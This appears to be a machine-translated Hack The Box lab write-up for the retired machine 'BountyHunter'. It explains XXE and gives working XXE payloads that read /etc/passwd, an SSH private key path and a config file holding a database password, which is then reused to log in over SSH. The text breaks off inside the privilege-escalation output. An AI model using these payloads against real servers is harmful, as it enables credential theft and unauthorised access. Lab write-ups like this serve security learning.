{"componentChunkName":"component---src-templates-post-template-js","path":"/hackthebox-linux-bugbountyhunter-en","result":{"data":{"markdownRemark":{"id":"1fe8f077-71ef-5968-9b4d-0a5f5a9075a7","html":"<blockquote>\n<p>This page has been machine-translated from the <a href=\"/hackthebox-linux-bugbountyhunter\">original page</a>.</p>\n</blockquote>\n<p>I am studying security using “Hack The Box,” a penetration testing learning platform.\nMy Hack The Box rank at the time of writing is ProHacker.</p>\n<img src=\"http://www.hackthebox.eu/badge/image/327080\" alt=\"Hack The Box\">\n<p>This is a writeup for the retired HackTheBox machine “BountyHunter.”</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 500px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/4d74412dfc7fdf1fe92e7b15531b03fb/0b533/image-11.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 73.75%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,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'); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/4d74412dfc7fdf1fe92e7b15531b03fb/8ac56/image-11.webp 240w,\n/static/4d74412dfc7fdf1fe92e7b15531b03fb/d3be9/image-11.webp 480w,\n/static/4d74412dfc7fdf1fe92e7b15531b03fb/b0a15/image-11.webp 500w\"\n              sizes=\"(max-width: 500px) 100vw, 500px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/4d74412dfc7fdf1fe92e7b15531b03fb/8ff5a/image-11.png 240w,\n/static/4d74412dfc7fdf1fe92e7b15531b03fb/e85cb/image-11.png 480w,\n/static/4d74412dfc7fdf1fe92e7b15531b03fb/0b533/image-11.png 500w\"\n            sizes=\"(max-width: 500px) 100vw, 500px\"\n        
    type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/4d74412dfc7fdf1fe92e7b15531b03fb/0b533/image-11.png\"\n            alt=\"image-11.png\"\n            title=\"image-11.png\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<!-- omit in toc -->\n<h2 id=\"about-this-article\" style=\"position:relative;\"><a href=\"#about-this-article\" aria-label=\"about this article permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>About This Article</h2>\n<p><strong>The content of this article is not intended to promote acts that violate social order.</strong></p>\n<p>Please be aware in advance that attempting to attack environments other than your own or environments for which you have permission may violate the “Act on Prohibition of Unauthorized Computer Access” (Unauthorized Access Prohibition Act).</p>\n<p>All opinions expressed are my own and do not represent those of any organization I belong to.</p>\n<!-- omit in toc -->\n<h2 id=\"table-of-contents\" style=\"position:relative;\"><a href=\"#table-of-contents\" aria-label=\"table of contents permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 
0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Table of Contents</h2>\n<ul>\n<li>\n<p><a href=\"#xxe-xml-external-entity\">XXE (XML External Entity)</a></p>\n<ul>\n<li><a href=\"#dtd\">DTD</a></li>\n</ul>\n</li>\n<li><a href=\"#enumeration\">Enumeration</a></li>\n<li><a href=\"#exploiting-xxe\">Exploiting XXE</a></li>\n<li>\n<p><a href=\"#privilege-escalation\">Privilege Escalation</a></p>\n<ul>\n<li><a href=\"#ticketvalidatorpy\">ticketValidator.py</a></li>\n</ul>\n</li>\n<li><a href=\"#summary\">Summary</a></li>\n</ul>\n<h2 id=\"xxe-xml-external-entity\" style=\"position:relative;\"><a href=\"#xxe-xml-external-entity\" aria-label=\"xxe xml external entity permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>XXE (XML External Entity)</h2>\n<p>Before going through the flag-capturing procedure, let me first summarize the XXE technique used here.</p>\n<p>XXE stands for XML External Entity. It is a vulnerability that arises when an XML parser accepts a DTD embedded in attacker-controlled input and resolves the external entities declared in it.</p>\n<p>By abusing XXE, an attacker can read files from the server, disclose internal information, and perform SSRF against hosts reachable from the server, among other things.</p>\n<p>Reference: <a href=\"https://www.mbsd.jp/blog/20171130.html\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">XXE Attack Basics | MBSD 
Blog</a></p>\n<p>Reference: <a href=\"https://owasp.org/www-community/vulnerabilities/XML_External_Entity_(XXE)_Processing\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">XML External Entity (XXE) Processing | OWASP</a></p>\n<p>Reference: <a href=\"https://amzn.to/3cKRReL\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">The Web Application Hacker’s Handbook (2nd edition)</a></p>\n<h3 id=\"dtd\" style=\"position:relative;\"><a href=\"#dtd\" aria-label=\"dtd permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>DTD</h3>\n<p>DTD stands for Document Type Definition; it declares the permitted structure (the schema) of an XML document and can be embedded in the document itself via <code class=\"language-text\">&lt;!DOCTYPE</code>.</p>\n<p>An <code class=\"language-text\">&lt;!ENTITY</code> declaration defines an entity that the document body can reference as <code class=\"language-text\">&amp;name;</code>. An internal entity substitutes a fixed string; an external entity declared with <code class=\"language-text\">SYSTEM</code> makes the parser fetch a file or URL and substitute its contents, which is exactly what XXE abuses. Because a raw file containing <code class=\"language-text\">&lt;</code> or <code class=\"language-text\">&amp;</code> would break the XML, the payloads in this writeup wrap the target in PHP’s <code class=\"language-text\">php://filter/convert.base64-encode</code> stream filter so the file comes back Base64-encoded.</p>\n<p>Reference: <a href=\"https://atmarkit.itmedia.co.jp/aig/01xml/dtd.html\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">XML Glossary [DTD (Document Type Definition)]</a></p>\n<p>Reference: <a href=\"https://ja.wikipedia.org/wiki/Document_Type_Definition\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">Document Type Definition - Wikipedia</a></p>\n<h2 id=\"enumeration\" style=\"position:relative;\"><a href=\"#enumeration\" aria-label=\"enumeration permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 
1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Enumeration</h2>\n<p>First, I run nmap.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\">Starting Nmap <span class=\"token number\">7.92</span> <span class=\"token punctuation\">(</span> https://nmap.org <span class=\"token punctuation\">)</span> at <span class=\"token number\">2021</span>-11-25 <span class=\"token number\">18</span>:26 JST\nNmap scan report <span class=\"token keyword\">for</span> <span class=\"token variable\">$RHOST</span> <span class=\"token punctuation\">(</span><span class=\"token number\">10.10</span>.11.100<span class=\"token punctuation\">)</span>\nHost is up <span class=\"token punctuation\">(</span><span class=\"token number\">0</span>.54s latency<span class=\"token punctuation\">)</span>.\nNot shown: <span class=\"token number\">998</span> closed tcp ports <span class=\"token punctuation\">(</span>conn-refused<span class=\"token punctuation\">)</span>\nPORT   STATE SERVICE VERSION\n<span class=\"token number\">22</span>/tcp <span class=\"token function\">open</span>  <span class=\"token function\">ssh</span>     OpenSSH <span class=\"token number\">8</span>.2p1 Ubuntu 4ubuntu0.2 <span class=\"token punctuation\">(</span>Ubuntu Linux<span class=\"token punctuation\">;</span> protocol <span class=\"token number\">2.0</span><span class=\"token punctuation\">)</span>\n<span class=\"token operator\">|</span> ssh-hostkey: \n<span class=\"token operator\">|</span>   <span class=\"token number\">3072</span> d4:4c:f5:79:9a:79:a3:b0:f1:66:25:52:c9:53:1f:e1 <span class=\"token punctuation\">(</span>RSA<span class=\"token punctuation\">)</span>\n<span class=\"token operator\">|</span>  
 <span class=\"token number\">256</span> a2:1e:67:61:8d:2f:7a:37:a7:ba:3b:51:08:e8:89:a6 <span class=\"token punctuation\">(</span>ECDSA<span class=\"token punctuation\">)</span>\n<span class=\"token operator\">|</span>_  <span class=\"token number\">256</span> a5:75:16:d9:69:58:50:4a:14:11:7a:42:c1:b6:23:44 <span class=\"token punctuation\">(</span>ED25519<span class=\"token punctuation\">)</span>\n<span class=\"token number\">80</span>/tcp <span class=\"token function\">open</span>  http    Apache httpd <span class=\"token number\">2.4</span>.41 <span class=\"token variable\"><span class=\"token punctuation\">((</span>Ubuntu<span class=\"token punctuation\">))</span></span>\n<span class=\"token operator\">|</span>_http-title: Bounty Hunters\n<span class=\"token operator\">|</span>_http-server-header: Apache/2.4.41 <span class=\"token punctuation\">(</span>Ubuntu<span class=\"token punctuation\">)</span>\nService Info: OS: Linux<span class=\"token punctuation\">;</span> CPE: cpe:/o:linux:linux_kernel\n\nService detection performed. 
Please report any incorrect results at https://nmap.org/submit/ <span class=\"token builtin class-name\">.</span>\nNmap done: <span class=\"token number\">1</span> IP address <span class=\"token punctuation\">(</span><span class=\"token number\">1</span> <span class=\"token function\">host</span> up<span class=\"token punctuation\">)</span> scanned <span class=\"token keyword\">in</span> <span class=\"token number\">178.60</span> seconds</code></pre></div>\n<p>Port 80 is open, so I access the web interface and find the following form:</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 500px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/b7aeade27c357723437385e55a8a6a33/0b533/image-12.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 42.91666666666667%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAJCAIAAAC9o5sfAAAACXBIWXMAARlAAAEZQAGA43XUAAAA2UlEQVQoz6WQaQtEUBSG/f//JMr4oAjZxohQCmlsg8gy71zNmtHUPB9up9N57lmovu8FQbAsS9d113VN05Rl+Ug4EZCUJCnLsjAMUYkMlIVAIeJ5/kBAkaZpHMfRNK2qqm3boigqisIwjOd5vu+zLAu/bVuY8zxTyztIjeM4DMM0TYiXXW7ydAdxHMdogiGLomia5kKoqmr961H2lF+B7DhOFEVJksA/E/I835ziU07TNAgCrIf+uFBZluhf1/VPMhbGYHgNw8Cpuq5b9/q68ybrevs3o5Y/uAJhSAFDJhazjgAAAABJRU5ErkJggg=='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/b7aeade27c357723437385e55a8a6a33/8ac56/image-12.webp 240w,\n/static/b7aeade27c357723437385e55a8a6a33/d3be9/image-12.webp 480w,\n/static/b7aeade27c357723437385e55a8a6a33/b0a15/image-12.webp 500w\"\n              sizes=\"(max-width: 500px) 100vw, 500px\"\n              type=\"image/webp\"\n            />\n          <source\n            
srcset=\"/static/b7aeade27c357723437385e55a8a6a33/8ff5a/image-12.png 240w,\n/static/b7aeade27c357723437385e55a8a6a33/e85cb/image-12.png 480w,\n/static/b7aeade27c357723437385e55a8a6a33/0b533/image-12.png 500w\"\n            sizes=\"(max-width: 500px) 100vw, 500px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/b7aeade27c357723437385e55a8a6a33/0b533/image-12.png\"\n            alt=\"image-12.png\"\n            title=\"image-12.png\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>I also run feroxbuster to scan for directories.</p>\n<p>The backend appears to be PHP, so I specify PHP in the options.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\">feroxbuster -u http://<span class=\"token variable\">$RHOST</span>/ -x php -w /usr/share/wordlists/raft-medium-directories.txt --no-recursion <span class=\"token operator\">|</span> <span class=\"token function\">tee</span> feroxbuster.txt\n\n<span class=\"token number\">301</span>        9l       28w      313c http://<span class=\"token variable\">$RHOST</span>/js\n<span class=\"token number\">301</span>        9l       28w      314c http://<span class=\"token variable\">$RHOST</span>/css\n<span class=\"token number\">301</span>        9l       28w      317c http://<span class=\"token variable\">$RHOST</span>/assets\n<span class=\"token number\">200</span>        0l        0w        0c http://<span class=\"token variable\">$RHOST</span>/db.php\n<span class=\"token number\">301</span>        9l       28w      320c http://<span class=\"token variable\">$RHOST</span>/resources\n<span class=\"token number\">200</span>      388l     1470w        0c http://<span class=\"token variable\">$RHOST</span>/index.php\n<span 
class=\"token number\">200</span>        5l       15w      125c http://<span class=\"token variable\">$RHOST</span>/portal.php</code></pre></div>\n<p>Looking at the form’s script, it constructs an XML string from each input value, Base64-encodes it, and POST-submits it to <code class=\"language-text\">/tracker_diRbPr00f314.php</code>. (The string that’s actually sent seems to be further transformed from the Base64, though I couldn’t fully understand where or how.)</p>\n<div class=\"gatsby-highlight\" data-language=\"javascript\"><pre class=\"language-javascript\"><code class=\"language-javascript\"><span class=\"token keyword\">function</span> <span class=\"token function\">returnSecret</span><span class=\"token punctuation\">(</span><span class=\"token parameter\">data</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">{</span>\n<span class=\"token keyword\">return</span> Promise<span class=\"token punctuation\">.</span><span class=\"token function\">resolve</span><span class=\"token punctuation\">(</span>$<span class=\"token punctuation\">.</span><span class=\"token function\">ajax</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">{</span>\n            <span class=\"token literal-property property\">type</span><span class=\"token operator\">:</span> <span class=\"token string\">\"POST\"</span><span class=\"token punctuation\">,</span>\n            <span class=\"token literal-property property\">data</span><span class=\"token operator\">:</span> <span class=\"token punctuation\">{</span><span class=\"token string-property property\">\"data\"</span><span class=\"token operator\">:</span>data<span class=\"token punctuation\">}</span><span class=\"token punctuation\">,</span>\n            <span class=\"token literal-property property\">url</span><span class=\"token operator\">:</span> <span class=\"token string\">\"tracker_diRbPr00f314.php\"</span>\n            <span class=\"token 
punctuation\">}</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n<span class=\"token punctuation\">}</span>\n\n<span class=\"token keyword\">async</span> <span class=\"token keyword\">function</span> <span class=\"token function\">bountySubmit</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">{</span>\n<span class=\"token keyword\">try</span> <span class=\"token punctuation\">{</span>\n<span class=\"token keyword\">var</span> xml <span class=\"token operator\">=</span> <span class=\"token template-string\"><span class=\"token template-punctuation string\">`</span><span class=\"token string\">&lt;?xml  version=\"1.0\" encoding=\"ISO-8859-1\"?>\n&lt;bugreport>\n&lt;title></span><span class=\"token interpolation\"><span class=\"token interpolation-punctuation punctuation\">${</span><span class=\"token function\">$</span><span class=\"token punctuation\">(</span><span class=\"token string\">'#exploitTitle'</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">.</span><span class=\"token function\">val</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token interpolation-punctuation punctuation\">}</span></span><span class=\"token string\">&lt;/title>\n&lt;cwe></span><span class=\"token interpolation\"><span class=\"token interpolation-punctuation punctuation\">${</span><span class=\"token function\">$</span><span class=\"token punctuation\">(</span><span class=\"token string\">'#cwe'</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">.</span><span class=\"token function\">val</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token interpolation-punctuation punctuation\">}</span></span><span class=\"token string\">&lt;/cwe>\n&lt;cvss></span><span 
class=\"token interpolation\"><span class=\"token interpolation-punctuation punctuation\">${</span><span class=\"token function\">$</span><span class=\"token punctuation\">(</span><span class=\"token string\">'#cvss'</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">.</span><span class=\"token function\">val</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token interpolation-punctuation punctuation\">}</span></span><span class=\"token string\">&lt;/cvss>\n&lt;reward></span><span class=\"token interpolation\"><span class=\"token interpolation-punctuation punctuation\">${</span><span class=\"token function\">$</span><span class=\"token punctuation\">(</span><span class=\"token string\">'#reward'</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">.</span><span class=\"token function\">val</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token interpolation-punctuation punctuation\">}</span></span><span class=\"token string\">&lt;/reward>\n&lt;/bugreport></span><span class=\"token template-punctuation string\">`</span></span>\n<span class=\"token keyword\">let</span> data <span class=\"token operator\">=</span> <span class=\"token keyword\">await</span> <span class=\"token function\">returnSecret</span><span class=\"token punctuation\">(</span><span class=\"token function\">btoa</span><span class=\"token punctuation\">(</span>xml<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n  <span class=\"token function\">$</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"#return\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">.</span><span class=\"token function\">html</span><span class=\"token punctuation\">(</span>data<span class=\"token 
punctuation\">)</span>\n<span class=\"token punctuation\">}</span>\n<span class=\"token keyword\">catch</span><span class=\"token punctuation\">(</span>error<span class=\"token punctuation\">)</span> <span class=\"token punctuation\">{</span>\nconsole<span class=\"token punctuation\">.</span><span class=\"token function\">log</span><span class=\"token punctuation\">(</span><span class=\"token string\">'Error:'</span><span class=\"token punctuation\">,</span> error<span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n<span class=\"token punctuation\">}</span>\n<span class=\"token punctuation\">}</span></code></pre></div>\n<p>XXE looks applicable here, so I’ll try various approaches next.</p>\n<h2 id=\"exploiting-xxe\" style=\"position:relative;\"><a href=\"#exploiting-xxe\" aria-label=\"exploiting xxe permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Exploiting XXE</h2>\n<p>I modify the script in the browser console as follows and submit the form.</p>\n<div class=\"gatsby-highlight\" data-language=\"javascript\"><pre class=\"language-javascript\"><code class=\"language-javascript\"><span class=\"token keyword\">async</span> <span class=\"token keyword\">function</span> <span class=\"token function\">bountySubmit</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">{</span>\n<span class=\"token keyword\">try</span> <span class=\"token punctuation\">{</span>\n<span class=\"token 
keyword\">var</span> xml <span class=\"token operator\">=</span> <span class=\"token template-string\"><span class=\"token template-punctuation string\">`</span><span class=\"token string\">&lt;?xml  version=\"1.0\" encoding=\"ISO-8859-1\"?>\n&lt;!DOCTYPE foo [ &lt;!ENTITY xxe SYSTEM \"php://filter/convert.base64-encode/resource=/etc/passwd\">] > \n&lt;bugreport>\n&lt;title>&amp;xxe;&lt;/title>\n&lt;cwe></span><span class=\"token interpolation\"><span class=\"token interpolation-punctuation punctuation\">${</span><span class=\"token function\">$</span><span class=\"token punctuation\">(</span><span class=\"token string\">'#cwe'</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">.</span><span class=\"token function\">val</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token interpolation-punctuation punctuation\">}</span></span><span class=\"token string\">&lt;/cwe>\n&lt;cvss></span><span class=\"token interpolation\"><span class=\"token interpolation-punctuation punctuation\">${</span><span class=\"token function\">$</span><span class=\"token punctuation\">(</span><span class=\"token string\">'#cvss'</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">.</span><span class=\"token function\">val</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token interpolation-punctuation punctuation\">}</span></span><span class=\"token string\">&lt;/cvss>\n&lt;reward></span><span class=\"token interpolation\"><span class=\"token interpolation-punctuation punctuation\">${</span><span class=\"token function\">$</span><span class=\"token punctuation\">(</span><span class=\"token string\">'#reward'</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">.</span><span class=\"token function\">val</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span 
class=\"token interpolation-punctuation punctuation\">}</span></span><span class=\"token string\">&lt;/reward>\n&lt;/bugreport></span><span class=\"token template-punctuation string\">`</span></span>\n<span class=\"token keyword\">let</span> data <span class=\"token operator\">=</span> <span class=\"token keyword\">await</span> <span class=\"token function\">returnSecret</span><span class=\"token punctuation\">(</span><span class=\"token function\">btoa</span><span class=\"token punctuation\">(</span>xml<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n  <span class=\"token function\">$</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"#return\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">.</span><span class=\"token function\">html</span><span class=\"token punctuation\">(</span>data<span class=\"token punctuation\">)</span>\n<span class=\"token punctuation\">}</span>\n<span class=\"token keyword\">catch</span><span class=\"token punctuation\">(</span>error<span class=\"token punctuation\">)</span> <span class=\"token punctuation\">{</span>\nconsole<span class=\"token punctuation\">.</span><span class=\"token function\">log</span><span class=\"token punctuation\">(</span><span class=\"token string\">'Error:'</span><span class=\"token punctuation\">,</span> error<span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n<span class=\"token punctuation\">}</span>\n<span class=\"token punctuation\">}</span></code></pre></div>\n<p>This returns the Base64-encoded <code class=\"language-text\">passwd</code> in the <code class=\"language-text\">title</code> element.</p>\n<p>Looking at the regular user names, I found <code class=\"language-text\">development</code>, so I tried the following XXE payloads to retrieve the user flag or SSH private key — but unfortunately they all failed.</p>\n<div 
class=\"gatsby-highlight\" data-language=\"xml\"><pre class=\"language-xml\"><code class=\"language-xml\">&lt;!DOCTYPE foo [ &lt;!ENTITY xxe SYSTEM \"php://filter/convert.base64-encode/resource=/home/development/user.txt\">] >\n&lt;!DOCTYPE foo [ &lt;!ENTITY xxe SYSTEM \"php://filter/convert.base64-encode/resource=/home/development/Desktop/user.txt\">] >\n&lt;!DOCTYPE foo [ &lt;!ENTITY xxe SYSTEM \"php://filter/convert.base64-encode/resource=/home/development/.ssh/id_rsa\">] ></code></pre></div>\n<p>So I decided to retrieve other files from the server instead.</p>\n<p>From the earlier feroxbuster results, <code class=\"language-text\">db.php</code> looked suspicious.</p>\n<div class=\"gatsby-highlight\" data-language=\"php\"><pre class=\"language-php\"><code class=\"language-php\"># &lt;!DOCTYPE foo [ &lt;!ENTITY xxe SYSTEM \"php://filter/convert.base64-encode/resource=db.php\">]\n\n<span class=\"token php language-php\"><span class=\"token 
delimiter important\">&lt;?php</span>\n<span class=\"token comment\">// TODO -> Implement login system with the database.</span>\n<span class=\"token variable\">$dbserver</span> <span class=\"token operator\">=</span> <span class=\"token string double-quoted-string\">\"localhost\"</span><span class=\"token punctuation\">;</span>\n<span class=\"token variable\">$dbname</span> <span class=\"token operator\">=</span> <span class=\"token string double-quoted-string\">\"bounty\"</span><span class=\"token punctuation\">;</span>\n<span class=\"token variable\">$dbusername</span> <span class=\"token operator\">=</span> <span class=\"token string double-quoted-string\">\"admin\"</span><span class=\"token punctuation\">;</span>\n<span class=\"token variable\">$dbpassword</span> <span class=\"token operator\">=</span> <span class=\"token string double-quoted-string\">\"m19RoAU0hP41A1sTsq6K\"</span><span class=\"token punctuation\">;</span>\n<span class=\"token variable\">$testuser</span> <span class=\"token operator\">=</span> <span class=\"token string double-quoted-string\">\"test\"</span><span class=\"token punctuation\">;</span></span></code></pre></div>\n<p>This is what was actually retrieved.</p>\n<p>Database credentials are hardcoded in plaintext.</p>\n<p>I couldn’t find a database access endpoint, so I wasn’t sure what to do next — but I tried using the password for SSH as a last resort, and it worked! 
I obtained the user flag.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\"><span class=\"token function\">ssh</span> development@<span class=\"token variable\">$RHOST</span>\n<span class=\"token comment\"># m19RoAU0hP41A1sTsq6K</span></code></pre></div>\n<p>Next, I’ll go for root.</p>\n<h2 id=\"privilege-escalation\" style=\"position:relative;\"><a href=\"#privilege-escalation\" aria-label=\"privilege escalation permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Privilege Escalation</h2>\n<p>From here, I perform privilege escalation.</p>\n<p>I ran linpeas to gather useful information.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\"><span class=\"token comment\">#</span>\n Operative system\n https://book.hacktricks.xyz/linux-unix/privilege-escalation<span class=\"token comment\">#kernel-exploits</span>\nLinux version <span class=\"token number\">5.4</span>.0-80-generic <span class=\"token punctuation\">(</span>buildd@lcy01-amd64-030<span class=\"token punctuation\">)</span> <span class=\"token punctuation\">(</span>gcc version <span class=\"token number\">9.3</span>.0 <span class=\"token punctuation\">(</span>Ubuntu <span class=\"token number\">9.3</span>.0-17ubuntu1~20.04<span class=\"token punctuation\">))</span> <span class=\"token comment\">#90-Ubuntu SMP Fri Jul 9 22:49:44 UTC 2021</span>\nDistributor ID: Ubuntu\nDescription:    Ubuntu <span 
